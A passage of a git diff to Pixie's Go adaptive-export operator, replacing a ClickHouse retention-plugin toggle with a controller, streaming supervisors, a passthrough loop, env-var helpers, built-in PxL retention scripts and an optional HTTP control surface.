- reconcile := func(want bool) {
- if pluginEnabled != nil && *pluginEnabled == want {
- log.Debugf("export already in desired state (enabled=%v), no action taken", want)
- return
+ ctlCfg := controller.Config{
+ Hostname: hostname,
+ Rec: rec,
+ Before: durEnv(envWindowBeforeSec, 5*time.Minute, time.Second),
+ After: durEnv(envWindowAfterSec, 5*time.Minute, time.Second),
+ MaxParallelQueriesPerHash: intEnvOrZero(envMaxParallelQueriesPerHash),
+ MaxInflightQueriesGlobal: intEnvOrZero(envMaxInflightQueriesGlobal),
+ EmptyResultSkipAfterN: intEnvOrZero(envEmptyResultSkipAfterN),
+ EmptyResultSkipTTL: durEnvOrZero(envEmptyResultSkipTTLSec, time.Second),
+ }
+ if streamingMode {
+ // Route through the non-blocking notifier — handle() returns
+ // in <1µs even if ActiveSet writers are slow. Host-pid pods
+ // (empty Pod) are filtered inside the notifier.
+ ctlCfg.OnAttribution = attrNotifier.SubmitFromController
+ ctlCfg.OnPrune = attrNotifier.RemoveFromController
+ }
+ if !streamingMode && pushPixieRequested {
+ // PxL's px.DataFrame(table=…) rejects dotted table names even
+ // though px.GetSchemas() lists them. Drop them from the push
+ // list; the cloud-side retention plugin would have to handle
+ // those if the user wants them.
+ var tables []string
+ for _, t := range pxl.Names(pxl.Builtins()) {
+ if strings.Contains(t, ".") {
+ log.WithField("table", t).Info("skipping dotted-name table from push list — PxL DataFrame rejects it")
+ continue
+ }
+ tables = append(tables, t)
}
- pluginCtx, pluginCancel := context.WithTimeout(ctx, 2*time.Minute)
- defer pluginCancel()
- if want {
- log.Info("Enabling forensic export")
- if err := enableClickHousePlugin(pluginCtx, pluginClient, cfg, clusterID, clusterName); err != nil {
- log.WithError(err).Error("failed to enable forensic export")
- return
+ ctlCfg.PushPixieTables = tables
+ log.WithField("tables", ctlCfg.PushPixieTables).
+ Info("ADAPTIVE_PUSH_PIXIE_ROWS=true — operator will query pixie + write rows directly on each anomaly")
+ }
+ // Optional single-shot / custom refresh override (default-unchanged when
+ // unset). Negative → single-shot: exactly one pull per anomaly window.
+ if v := strings.TrimSpace(os.Getenv(envPushRefreshSec)); v != "" {
+ if n, err := strconv.Atoi(v); err == nil {
+ if n < 0 {
+ ctlCfg.PushRefreshInterval = -1
+ log.Info(envPushRefreshSec + "<0 — single-shot pull mode (one pull per anomaly window)")
+ } else {
+ ctlCfg.PushRefreshInterval = time.Duration(n) * time.Second
}
- v := true
- pluginEnabled = &v
- log.Info("Forensic export enabled successfully")
} else {
- log.Info("Disabling forensic export")
- if err := disableClickHousePlugin(pluginCtx, pluginClient, cfg, clusterID, clusterName); err != nil {
- log.WithError(err).Error("failed to disable forensic export")
- return
- }
- v := false
- pluginEnabled = &v
- quietStreak = 0
- log.Info("Forensic export disabled successfully")
+ log.WithField("value", v).Warn(envPushRefreshSec + " not an integer; using default refresh")
}
}
-
- log.Infof("Detection task starting (mode=%s, quietTicks=%d)", mode, quietTicks)
-
- for {
- select {
- case <-ctx.Done():
- log.Info("Detection task shutting down")
- return
- case <-ticker.C:
- switch mode {
- case config.ExportModeAlways:
- reconcile(true)
- continue
- case config.ExportModeNever:
- reconcile(false)
- continue
+ ctl := controller.New(trg, snk, ctlCfg, nil)
+
+ // Build the pixie adapter ONCE — shared by rev-2's pushPixieRows
+ // path, the rev-3 streaming.Supervisor, AND the firehose passthrough
+ // loop. All three need a live pxapi client; constructing once avoids
+ // holding two parallel grpc streams for the same vizier.
+ passthroughEnabled := strings.EqualFold(os.Getenv(envPassthrough), "true")
+ var pixieAdapterInst *pixieapi.Adapter
+ if len(ctlCfg.PushPixieTables) > 0 || streamingMode || passthroughEnabled {
+ var adapter *pixieapi.Adapter
+ if direct := os.Getenv("ADAPTIVE_VIZIER_DIRECT_ADDR"); direct != "" {
+ // Direct mode — bypass the cloud's passthrough proxy and
+ // connect to the in-cluster vizier-query-broker. Use this
+ // on self-hosted clouds where pxapi.WithAPIKey isn't
+ // authorized for the cluster (e.g. a freshly-deployed
+ // vizier whose ID isn't yet linked to the API key's owner).
+ a, err := pixieapi.NewDirectFromEnv(cfg.Pixie().ClusterID())
+ if err != nil {
+ log.WithError(err).Fatal("ADAPTIVE_VIZIER_DIRECT_ADDR set but direct-mode adapter init failed")
}
-
- // auto mode: detection drives the state.
- log.Debug("Running detection script")
- execCtx, cancel := context.WithTimeout(ctx, scriptExecutionTimeout)
- recordCount, err := pxl.ExecuteScript(execCtx, pxClient, clusterID, renderDetectionScript(cfg.ClickHouse(), detectionLookback))
- cancel()
+ log.WithField("addr", direct).Info("pixieapi: direct mode (bypassing cloud proxy)")
+ adapter = a
+ } else {
+ pxClient, err := pxapi.NewClient(ctx,
+ pxapi.WithAPIKey(cfg.Pixie().APIKey()),
+ pxapi.WithCloudAddr(cfg.Pixie().Host()))
if err != nil {
- log.WithError(err).Error("failed to execute detection script")
- continue
+ log.WithError(err).Fatal("failed to create pxapi client")
}
- log.Debugf("Detection script returned %d records", recordCount)
+ adapter = pixieapi.New(pxClient, cfg.Pixie().ClusterID())
+ }
+ pixieAdapterInst = adapter
+ if len(ctlCfg.PushPixieTables) > 0 {
+ ctl = ctl.WithPixieQuerier(&pixieAdapter{a: adapter})
+ }
+ }
- if recordCount > 0 {
- quietStreak = 0
- reconcile(true)
- } else {
- quietStreak++
- if quietStreak >= quietTicks {
- reconcile(false)
+ // 5. Rehydrate active state across crashes.
+ if err := ctl.Rehydrate(ctx); err != nil {
+ log.WithError(err).Warn("could not rehydrate active set; starting cold")
+ } else {
+ log.WithField("active", ctl.Active()).Info("active set rehydrated")
+ }
+
+ // 6. Periodic prune of in-memory expired entries + main controller loop.
+ // Both goroutines are tracked in a WaitGroup so SIGTERM cleanly waits
+ // for in-flight HTTP calls (trigger 5s timeout, sink 30s timeout)
+ // instead of being cut off by an arbitrary 500ms sleep.
+ pruneInterval := durEnv(envPruneIntervalSec, 30*time.Second, time.Second)
+ var wg sync.WaitGroup
+ wg.Add(1)
+ go func() {
+ defer wg.Done()
+ t := time.NewTicker(pruneInterval)
+ defer t.Stop()
+ for {
+ select {
+ case <-ctx.Done():
+ return
+ case <-t.C:
+ if removed := ctl.PruneExpired(); removed > 0 {
+ log.WithField("removed", removed).Debug("pruned expired active entries")
}
}
}
+ }()
+
+ // 7. Run the controller.
+ wg.Add(1)
+ go func() {
+ defer wg.Done()
+ if err := ctl.Run(ctx); err != nil && err != context.Canceled {
+ log.WithError(err).Error("controller exited with error")
+ }
+ }()
+
+ // 7b. Streaming mode (rev-3): start the per-table scanners +
+ // batched writers. Replaces the per-hash×per-table fan-out.
+ if streamingMode {
+ // Start the AttributionNotifier consumer so SubmitFromController
+ // calls actually get delivered to ActiveSet.
+ wg.Add(1)
+ go func() {
+ defer wg.Done()
+ attrNotifier.Run(ctx)
+ }()
+
+ // Seed the ActiveSet from the rehydrated controller so existing
+ // alive attribution rows resume streaming immediately on boot.
+ // Without this seeding, only fresh kubescape events would
+ // repopulate the set — losing N minutes of coverage per restart.
+ seedActiveSetFromRehydrate(ctl, activeSet)
+
+ builtins := pxl.Builtins()
+ streamTables := make([]string, 0, len(builtins))
+ for _, t := range pxl.Names(builtins) {
+ if strings.Contains(t, ".") {
+ continue // PxL DataFrame rejects dotted names
+ }
+ streamTables = append(streamTables, t)
+ }
+ updater := streaming.NewUpdater(activeSet, streaming.UpdaterConfig{
+ Debounce: durEnvOrZero("ADAPTIVE_STREAM_DEBOUNCE_SEC", time.Second),
+ MaxAllowlistSize: intEnvOrZero("ADAPTIVE_STREAM_MAX_ALLOWLIST"),
+ })
+ supervisor := streaming.NewSupervisor(
+ updater,
+ &pixieAdapter{a: pixieAdapterInst},
+ snk,
+ streamTables,
+ streaming.ScannerConfig{
+ QueryWindow: durEnvOrZero("ADAPTIVE_STREAM_WINDOW_SEC", time.Second),
+ RefreshInterval: durEnvOrZero("ADAPTIVE_STREAM_REFRESH_SEC", time.Second),
+ Rec: rec,
+ Hostname: hostname,
+ },
+ streaming.WriterConfig{
+ BatchRows: intEnvOrZero("ADAPTIVE_STREAM_BATCH_ROWS"),
+ BatchEvery: durEnvOrZero("ADAPTIVE_STREAM_BATCH_EVERY_SEC", time.Second),
+ },
+ )
+ wg.Add(1)
+ go func() {
+ defer wg.Done()
+ supervisor.Run(ctx)
+ }()
+ log.WithField("tables", streamTables).Info("rev-3 streaming supervisor started")
}
-}
-func disableClickHousePlugin(ctx context.Context, client *pixie.Client, cfg config.Config, clusterID string, clusterName string) error {
- plugin, err := client.GetClickHousePlugin()
- if err != nil {
- return fmt.Errorf("getting data retention plugins failed: %w", err)
+ // 7c. Firehose passthrough loop — independent of fan-out / streaming.
+ // Off unless ADAPTIVE_PASSTHROUGH=true. Reuses the same adapter +
+ // sink so byte-shape of written rows matches the AE-filter phase.
+ if passthroughEnabled {
+ if pixieAdapterInst == nil {
+ log.Fatal("ADAPTIVE_PASSTHROUGH=true but pixie adapter is nil — internal wiring bug")
+ }
+ // Compiled path is the default; ADAPTIVE_PASSTHROUGH_COMPILED=false
+ // reverts to the legacy serial QueryFor loop.
+ compiled := !strings.EqualFold(os.Getenv(envPassthroughCompiled), "false")
+ ptCfg := passthrough.Config{
+ Window: durEnv(envPassthroughWindow, 30*time.Second, time.Second),
+ Refresh: durEnv(envPassthroughRefresh, 30*time.Second, time.Second),
+ Rec: rec,
+ Hostname: hostname,
+ Compiled: compiled,
+ }
+ ptLoop := passthrough.New(&pixieAdapter{a: pixieAdapterInst}, snk, ptCfg)
+ wg.Add(1)
+ go func() {
+ defer wg.Done()
+ ptLoop.Run(ctx)
+ }()
+ log.WithFields(log.Fields{
+ "window": ptCfg.Window,
+ "refresh": ptCfg.Refresh,
+ "compiled": ptCfg.Compiled,
+ }).Info("ADAPTIVE_PASSTHROUGH=true — firehose loop running (no anomaly gate)")
}
- if !plugin.RetentionEnabled {
- log.Info("ClickHouse plugin already disabled; removing any lingering ch-* scripts")
- } else {
- if err := client.DisableClickHousePlugin(plugin.LatestVersion); err != nil {
- return fmt.Errorf("failed to disable ClickHouse plugin: %w", err)
+
+ log.WithFields(log.Fields{
+ "hostname": hostname,
+ "poll_interval": pollInterval,
+ "prune_interval": pruneInterval,
+ "window_before": ctlCfg.Before,
+ "window_after": ctlCfg.After,
+ }).Info("operator running")
+
+ // control surface: when CONTROL_ADDR is set, the per-node controller
+ // steers this AE's activeSet (Upsert/Remove) over HTTP. Off by default so
+ // the existing trigger→controller→activeSet flow is unchanged.
+ if addr := os.Getenv("CONTROL_ADDR"); addr != "" {
+ ctrlSrv := control.New(activeSet, nil) // OrderQuery runner wired later
+ ctrlSrv.SetGraphWriter(applier) // dx_attack_graph ingest → ClickHouse
+ // Bearer-JWT auth on the control surface (CodeRabbit: protect control
+ // endpoints). Same shared lib + signing key the broker/PEM use — dx
+ // attaches the service JWT it already mints. Default-OFF so this can
+ // merge before dx sends the bearer; flip CONTROL_REQUIRE_AUTH=true once
+ // dx is updated + PL_JWT_SIGNING_KEY is mounted. Safe incremental rollout.
+ if key := os.Getenv("PL_JWT_SIGNING_KEY"); key != "" && os.Getenv("CONTROL_REQUIRE_AUTH") == "true" {
+ ctrlSrv.SetAuth(key, "vizier")
+ log.Info("control surface: bearer-JWT auth ENABLED (audience=vizier)")
+ } else {
+ log.Warn("control surface: auth DISABLED (set CONTROL_REQUIRE_AUTH=true + PL_JWT_SIGNING_KEY)")
}
+ // Wrap in an http.Server with explicit timeouts so a slow client
+ // can't pin a goroutine on the control surface (CodeRabbit
+ // r3379377432). The control plane is small/idempotent JSON, so
+ // short read/write budgets are fine.
+ httpSrv := &http.Server{
+ Addr: addr,
+ Handler: ctrlSrv.Handler(),
+ ReadHeaderTimeout: 5 * time.Second,
+ ReadTimeout: 15 * time.Second,
+ WriteTimeout: 30 * time.Second,
+ IdleTimeout: 60 * time.Second,
+ }
+ go func() {
+ log.WithField("addr", addr).Info("control surface listening")
+ if err := httpSrv.ListenAndServe(); err != nil &&
+ err != http.ErrServerClosed {
+ log.WithError(err).Error("control surface stopped")
+ }
+ }()
}
- // Tear down the per-cluster ch-* retention scripts so the demo can be re-run cleanly.
- current, err := client.GetClusterScripts(clusterID, clusterName)
- if err != nil {
- return fmt.Errorf("failed to list retention scripts: %w", err)
+ sigCh := make(chan os.Signal, 1)
+ signal.Notify(sigCh, syscall.SIGINT, syscall.SIGTERM)
+ <-sigCh
+ log.Info("shutdown signal received; waiting for goroutines to drain")
+ cancel()
+ // Bound the wait so a hung HTTP call can't keep the process up forever.
+ done := make(chan struct{})
+ go func() { wg.Wait(); close(done) }()
+ select {
+ case <-done:
+ log.Info("clean shutdown")
+ case <-time.After(35 * time.Second):
+ log.Warn("shutdown deadline reached with goroutines still running; exiting")
}
- var errs []error
- for _, s := range current {
- log.Infof("Deleting retention script %s", s.Name)
- if err := client.DeleteDataRetentionScript(s.ScriptId); err != nil {
- errs = append(errs, err)
- }
+}
+
+// chHTTPEndpoint resolves the ClickHouse HTTP endpoint. Explicit env
+// override wins; otherwise build "http://:8123" from config.
+func chHTTPEndpoint(host, override string) string {
+ if override != "" {
+ return strings.TrimRight(override, "/")
}
- if len(errs) > 0 {
- return fmt.Errorf("errors while deleting retention scripts: %v", errs)
+ if host == "" {
+ host = "localhost"
}
- return nil
+ return "http://" + host + ":8123"
}
-func enableClickHousePlugin(ctx context.Context, client *pixie.Client, cfg config.Config, clusterID string, clusterName string) error {
- log.Info("Checking the current ClickHouse plugin configuration")
- plugin, err := client.GetClickHousePlugin()
- if err != nil {
- return fmt.Errorf("getting data retention plugins failed: %w", err)
+// resolveHostname picks the node identity for node-local scoping.
+// REQUIRES NODE_NAME (set via k8s downward API spec.nodeName). The
+// previous os.Hostname() fallback returned the POD hostname, not the
+// node — making the operator silently miss its node's rows.
+func resolveHostname() (string, error) {
+ if v := strings.TrimSpace(os.Getenv(envNodeName)); v != "" {
+ return v, nil
}
+ return "", fmt.Errorf("%s env var is required (set via k8s downward API: valueFrom.fieldRef.fieldPath=spec.nodeName)", envNodeName)
+}
- enablePlugin := true
- if plugin.RetentionEnabled {
- enablePlugin = false
- config, err := client.GetClickHousePluginConfig()
- if err != nil {
- return fmt.Errorf("getting ClickHouse plugin config failed: %w", err)
- }
- if config.ExportURL != cfg.ClickHouse().DSN() {
- log.Info("ClickHouse plugin is configured with different DSN... Overwriting")
- enablePlugin = true
- }
+// durEnv reads a positive-integer-valued duration env var. unit
+// defines the unit (time.Second, time.Millisecond). Returns dflt on
+// missing / unparseable / non-positive values — non-positive would
+// either panic time.NewTicker or invert the attribution window, so
+// we fall back to the default and log loudly.
+func durEnv(key string, dflt, unit time.Duration) time.Duration {
+ v := strings.TrimSpace(os.Getenv(key))
+ if v == "" {
+ return dflt
+ }
+ n, err := strconv.ParseInt(v, 10, 64)
+ if err != nil {
+ log.WithError(err).WithFields(log.Fields{"key": key, "value": v}).
+ Warn("invalid duration env; using default")
+ return dflt
+ }
+ if n <= 0 {
+ log.WithFields(log.Fields{"key": key, "value": v}).
+ Warn("non-positive duration env; using default")
+ return dflt
}
+ return time.Duration(n) * unit
+}
- if enablePlugin {
- log.Info("Enabling ClickHouse plugin")
- err := client.EnableClickHousePlugin(&pixie.ClickHousePluginConfig{
- ExportURL: cfg.ClickHouse().DSN(),
- }, plugin.LatestVersion)
- if err != nil {
- return fmt.Errorf("failed to enable ClickHouse plugin: %w", err)
- }
+// intEnv reads a positive-integer-valued env var. Returns dflt on
+// missing / unparseable / non-positive. Same shape as durEnv but
+// without the unit multiplier — for counts (e.g. row limits).
+func intEnv(key string, dflt int) int {
+ v := strings.TrimSpace(os.Getenv(key))
+ if v == "" {
+ return dflt
+ }
+ n, err := strconv.Atoi(v)
+ if err != nil {
+ log.WithError(err).WithFields(log.Fields{"key": key, "value": v}).
+ Warn("invalid int env; using default")
+ return dflt
}
+ if n <= 0 {
+ log.WithFields(log.Fields{"key": key, "value": v}).
+ Warn("non-positive int env; using default")
+ return dflt
+ }
+ return n
+}
- log.Info("Setting up the data retention scripts")
+// intEnvOrZero is like intEnv but treats unset / empty / non-positive
+// as 0 (= "feature disabled"). Used for opt-in throttle knobs where 0
+// preserves legacy behavior and a positive integer enables the throttle.
+func intEnvOrZero(key string) int {
+ v := strings.TrimSpace(os.Getenv(key))
+ if v == "" {
+ return 0
+ }
+ n, err := strconv.Atoi(v)
+ if err != nil || n < 0 {
+ log.WithFields(log.Fields{"key": key, "value": v}).
+ Warn("invalid int env; treating as 0 (disabled)")
+ return 0
+ }
+ return n
+}
- log.Info("Getting preset script from the Pixie plugin")
- defsFromPixie, err := client.GetPresetScripts()
- if err != nil {
- return fmt.Errorf("failed to get preset scripts: %w", err)
+// durEnvOrZero is the duration-typed counterpart. unit lets the caller
+// express the env value in seconds / milliseconds without per-knob
+// parsing logic. 0 → returned as 0 (= feature disabled).
+func durEnvOrZero(key string, unit time.Duration) time.Duration {
+ n := intEnvOrZero(key)
+ if n <= 0 {
+ return 0
}
+ return time.Duration(n) * unit
+}
- // Filter presets by an allow-list of case-insensitive substrings in the
- // script name. Useful when the destination ClickHouse doesn't have every
- // target table pre-created (Pixie's C++ ClickHouseExportSinkNode aborts
- // kelvin on UNKNOWN_TABLE from CH — upstream bug), so we must not install
- // retention scripts whose target table is missing.
+// seedActiveSetFromRehydrate reads the operator's rehydrated
+// attribution rows back from CH and Upserts them into the streaming
+// ActiveSet. Without this, a restart in streaming mode leaves the
+// scanners with an empty allowlist until the next kubescape event
+// arrives — N minutes of coverage gap per restart.
+func seedActiveSetFromRehydrate(ctl *controller.Controller, set *activeset.ActiveSet) {
+ // The controller's Rehydrate already populated its in-memory
+ // active map from CH. We re-issue QueryActive here to mirror
+ // those rows into the ActiveSet — keeping the streaming layer
+ // fully decoupled from controller internals.
//
- // Example: ALLOWED_RETENTION_SCRIPTS="conn_stats" installs only the
- // conn_stats preset (matches "conn_stats export"), skipping dc_snoop +
- // stack_traces which target tables that don't exist in soc's schema.sql.
- //
- // Empty/unset = no filter (install every preset — the prior behavior).
- definitions := defsFromPixie
- if allow := strings.TrimSpace(os.Getenv("ALLOWED_RETENTION_SCRIPTS")); allow != "" {
- tokens := strings.Split(allow, ",")
- filtered := make([]*script.ScriptDefinition, 0, len(defsFromPixie))
- for _, d := range defsFromPixie {
- nameLower := strings.ToLower(d.Name)
- for _, t := range tokens {
- t = strings.ToLower(strings.TrimSpace(t))
- if t != "" && strings.Contains(nameLower, t) {
- filtered = append(filtered, d)
- break
- }
- }
+ // Timeout: defaults to 60s (bumped from a 30s hardcode for
+ // the rev-2 schema); ADAPTIVE_SCRIPT_TIMEOUT_SECONDS overrides for
+ // busy clusters where a large rehydrate snapshot won't land in
+ // the default window. Defensive: the operator could not reproduce
+ // the original "DeadlineExceeded" symptom on the soak PG, but
+ // the env knob exists so operators don't have to ship a patch
+ // to widen it.
+ scriptTimeout := durEnv("ADAPTIVE_SCRIPT_TIMEOUT_SECONDS", 60*time.Second, time.Second)
+ ctx, cancel := context.WithTimeout(context.Background(), scriptTimeout)
+ defer cancel()
+ rows, err := ctl.SnapshotActive(ctx)
+ if err != nil {
+ log.WithError(err).Warn("seed: SnapshotActive failed; streaming starts cold")
+ return
+ }
+ for _, r := range rows {
+ if r.Pod == "" {
+ continue
}
- log.Infof("ALLOWED_RETENTION_SCRIPTS=%q; filtered presets: %d of %d kept", allow, len(filtered), len(defsFromPixie))
- definitions = filtered
+ set.Upsert(activeset.Key{Namespace: r.Namespace, Pod: r.Pod}, r.TEnd)
}
+ log.WithField("seeded", set.Size()).Info("streaming.ActiveSet seeded from rehydrated rows")
+}
- log.Infof("Getting current scripts for cluster")
- currentScripts, err := client.GetClusterScripts(clusterID, clusterName)
+// pixieAdapter wraps pixieapi.Adapter so its return type matches the
+// controller's PixieQuerier interface (which uses []map[string]any
+// rather than the pixieapi-internal Row alias).
+type pixieAdapter struct{ a *pixieapi.Adapter }
+
+func (p *pixieAdapter) Query(ctx context.Context, src string) ([]map[string]any, error) {
+ rows, err := p.a.Query(ctx, src)
if err != nil {
- return fmt.Errorf("failed to get data retention scripts: %w", err)
+ return nil, err
}
-
- actions := script.GetActions(definitions, currentScripts, script.ScriptConfig{
- ClusterName: clusterName,
- ClusterId: clusterID,
- CollectInterval: cfg.Worker().CollectInterval(),
- })
-
- var errs []error
-
- for _, s := range actions.ToDelete {
- log.Infof("Deleting script %s", s.Name)
- err := client.DeleteDataRetentionScript(s.ScriptId)
- if err != nil {
- errs = append(errs, err)
- }
+ out := make([]map[string]any, len(rows))
+ for i, r := range rows {
+ out[i] = map[string]any(r)
}
+ return out, nil
+}
- for _, s := range actions.ToUpdate {
- log.Infof("Updating script %s", s.Name)
- err := client.UpdateDataRetentionScript(clusterID, s.ScriptId, s.Name, s.Description, s.FrequencyS, s.Script)
- if err != nil {
- errs = append(errs, err)
+// installPresetScripts purges any stale ClickHouse-plugin retention
+// scripts on the cluster, then installs the operator's built-in PxL
+// scripts targeting the 13 socket_tracer tables we DDL'd. Cloud-side
+// "presets" are deliberately ignored: in this fork the legacy
+// "conn_stats export" / "dc snoop export" / "stack_traces export"
+// preset names predate the rev-2 schema and would silently fail to
+// write. conn_stats is now in the rev-2 schema, but it
+// ships as "ch-conn_stats" (operator-managed naming) — the legacy
+// "conn_stats export" preset name is still purged below so a stale
+// one doesn't double-write.
+func installPresetScripts(client *pixie.Client, clusterID, clusterName string) (int, error) {
+ current, err := client.GetClusterScripts(clusterID, clusterName)
+ if err != nil {
+ return 0, fmt.Errorf("get cluster scripts: %w", err)
+ }
+ currentNames := make([]string, 0, len(current))
+ for _, s := range current {
+ currentNames = append(currentNames, s.Name)
+ }
+ log.WithFields(log.Fields{
+ "already_on_cluster": len(current),
+ "cluster_script_names": currentNames,
+ }).Info("preset script install — purging managed + installing built-ins")
+
+ // Purge ONLY scripts we recognise as operator-managed or as legacy
+ // presets we know are broken in the rev-2 schema. User-authored
+ // retention scripts are left alone.
+ for _, s := range current {
+ if !isOperatorManagedScript(s.Name) {
+ log.WithField("script", s.Name).
+ Debug("preset install — leaving user-authored script alone")
+ continue
+ }
+ if err := client.DeleteDataRetentionScript(s.ScriptID); err != nil {
+ log.WithError(err).WithField("script", s.Name).Warn("failed to delete stale script")
+ continue
}
+ log.WithField("script", s.Name).Info("purged stale retention script")
}
- for _, s := range actions.ToCreate {
- log.Infof("Creating script %s", s.Name)
- err := client.AddDataRetentionScript(clusterID, s.Name, s.Description, s.FrequencyS, s.Script)
- if err != nil {
- errs = append(errs, err)
+ // Install built-ins.
+ presets := builtinPresetScripts()
+ installed := 0
+ for _, p := range presets {
+ if err := client.AddDataRetentionScript(clusterID, p.Name, p.Description, p.FrequencyS, p.Script); err != nil {
+ log.WithError(err).WithField("script", p.Name).Warn("failed to install built-in script")
+ continue
}
+ installed++
+ log.WithField("script", p.Name).Info("installed retention script")
}
+ return installed, nil
+}
- if len(errs) > 0 {
- return fmt.Errorf("errors while setting up data retention scripts: %v", errs)
+// isOperatorManagedScript decides whether a cluster-side retention
+// script is safe to delete during INSTALL_PRESET_SCRIPTS. The criteria:
+//
+// 1. Anything with the "ch-" prefix matches the operator's own
+// builtinPresetScripts naming (ch-) — managed.
+// 2. The legacy AOCC presets we explicitly want to retire because
+// their target tables don't exist in the rev-2 schema:
+// "conn_stats export", "dc snoop export", "stack_traces export".
+//
+// Any other script is assumed user-authored and left alone.
+func isOperatorManagedScript(name string) bool {
+ if strings.HasPrefix(name, "ch-") {
+ return true
}
-
- log.Info("All done! The ClickHouse plugin is now configured.")
- return nil
+ switch name {
+ case "conn_stats export", "dc snoop export", "stack_traces export":
+ return true
+ }
+ return false
}
-func setupPixie(ctx context.Context, cfg config.Pixie, tries int, sleepTime time.Duration) (*pixie.Client, error) {
- apiKey := cfg.APIKey()
- host := cfg.Host()
- log.Infof("setupPixie: API Key length=%d, Host=%s", len(apiKey), host)
-
- for tries > 0 {
- // Use parent context - client stores this and uses it for all subsequent operations
- client, err := pixie.NewClient(ctx, apiKey, host)
- if err == nil {
- return client, nil
- }
- tries -= 1
- log.WithError(err).Warning("error creating Pixie API client")
- if tries > 0 {
- time.Sleep(sleepTime)
- }
+// builtinPresetScripts returns a minimum set of PxL scripts mirroring
+// the canonical Pixie preset shape — one bulk-write script per
+// socket_tracer table. Each adds namespace + pod columns and emits to
+// the matching CH table via px.display(name='') which the
+// retention plugin maps to forensic_db..
+//
+// Schedule: 10s. Window: -15s (overlap so we don't lose rows during
+// schedule jitter).
+func builtinPresetScripts() []*script.ScriptDefinition {
+ // Drop dotted-name tables (http2_messages.beta, kafka_events.beta):
+ // `px.DataFrame(table='…')` rejects them at PxL compile time, so a
+ // preset for them would be permanently broken. The cloud-side
+ // retention plugin would have to handle those if needed.
+ tables := []string{
+ "http_events", "dns_events", "redis_events", "mysql_events",
+ "pgsql_events", "cql_events", "mongodb_events", "amqp_events",
+ "mux_events", "tls_events",
+ // conn_stats — counter snapshots; same shape as
+ // the protocol-events PxL (DataFrame + namespace/pod cols +
+ // px.display). Each pull is one snapshot row per (remote tuple,
+ // protocol); ClickHouse merges by (hostname, event_time).
+ "conn_stats",
+ }
+ out := make([]*script.ScriptDefinition, 0, len(tables))
+ for _, t := range tables {
+ body := "import px\n" +
+ "df = px.DataFrame(table='" + t + "', start_time='-15s')\n" +
+ "df.namespace = px.upid_to_namespace(df.upid)\n" +
+ "df.pod = px.upid_to_pod_name(df.upid)\n" +
+ "px.display(df, '" + t + "')\n"
+ out = append(out, &script.ScriptDefinition{
+ Name: "ch-" + t,
+ Description: "adaptive_export builtin preset for " + t,
+ FrequencyS: 10,
+ Script: body,
+ IsPreset: false,
+ })
}
- return nil, fmt.Errorf("exceeded maximum number of retries")
+ return out
}
diff --git a/src/vizier/services/adaptive_export/internal/activeset/BUILD.bazel b/src/vizier/services/adaptive_export/internal/activeset/BUILD.bazel
new file mode 100644
index 00000000000..9003a0f131d
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/activeset/BUILD.bazel
@@ -0,0 +1,25 @@
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# SPDX-License-Identifier: Apache-2.0
+
+load("@io_bazel_rules_go//go:def.bzl", "go_library")
+load("//bazel:pl_build_system.bzl", "pl_go_test")
+
+go_library(
+ name = "activeset",
+ srcs = ["activeset.go"],
+ importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset",
+ visibility = ["//src/vizier/services/adaptive_export:__subpackages__"],
+)
+
+pl_go_test(
+ name = "activeset_test",
+ srcs = ["activeset_test.go"],
+ embed = [":activeset"],
+)
diff --git a/src/vizier/services/adaptive_export/internal/activeset/activeset.go b/src/vizier/services/adaptive_export/internal/activeset/activeset.go
new file mode 100644
index 00000000000..3cbc40ff390
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/activeset/activeset.go
@@ -0,0 +1,267 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+// Package activeset owns the "currently being streamed" pod set for
+// the rev-3 adaptive-write streaming path. One ActiveSet per
+// operator process.
+//
+// Why it exists: rev-2's pushPixieRows fan-out gated streaming
+// per-(hash, table); the fan-out spawned an O(active_hashes × tables)
+// concurrency tree that DoS'd vizier-query-broker under load. Rev-3
+// inverts the relationship: ONE PxL submission per table per refresh,
+// embedding an allowlist drawn from this ActiveSet. The set is keyed
+// per-pod, not per-hash, because pixie events have no hash dimension
+// — multiple anomaly hashes on the same pod share one stream slot.
+//
+// Membership is computed from kubescape attribution: a pod is in the
+// set iff there is at least one anomaly-attribution row for it whose
+// t_end is in the future.
+package activeset
+
+import (
+ "sync"
+ "time"
+)
+
+// Key identifies one pod in the set. "namespace/pod" matches what
+// `px.upid_to_pod_name` returns inside PxL, so embedding Keys verbatim
+// into a PxL allowlist filter requires no transformation.
+type Key struct {
+ Namespace string
+ Pod string
+}
+
+// Render returns the "namespace/pod" form used in PxL allowlists.
+// Pod-only Keys (empty Namespace) render as bare "pod" — kept for
+// host-pid edge cases though those don't currently reach a stream.
+func (k Key) Render() string {
+ if k.Namespace == "" {
+ return k.Pod
+ }
+ return k.Namespace + "/" + k.Pod
+}
+
+// Delta describes a change to the set. Subscribers receive deltas
+// to know when to re-evaluate stream submissions. Both slices may
+// be non-empty in a single delta when concurrent upserts and prunes
+// land in the same delivery window.
+type Delta struct {
+ Added []Key
+ Removed []Key
+ Version uint64 // monotonic; matches the post-delta version of the set
+}
+
+// ActiveSet is a goroutine-safe, version-counted pod set with
+// fan-out delta delivery.
+type ActiveSet struct {
+ mu sync.Mutex
+ members map[Key]time.Time // pod → t_end (when the active window expires absent further extension)
+ version uint64
+
+ // subs are independent buffered channels — one per subscriber.
+ // Buffered so a slow consumer can't block an upserter; oldest
+ // delta is dropped on overflow (subscriber observes a version
+ // skip and is expected to re-snapshot).
+ subsMu sync.Mutex
+ subs []chan Delta
+}
+
+// New returns an empty ActiveSet.
+func New() *ActiveSet {
+ return &ActiveSet{
+ members: map[Key]time.Time{},
+ }
+}
+
+// Upsert sets or extends a pod's t_end. Idempotent — if the pod is
+// already present with a >= t_end, no delta is emitted (caller-side
+// dedup of trivial extensions; saves debouncer churn).
+//
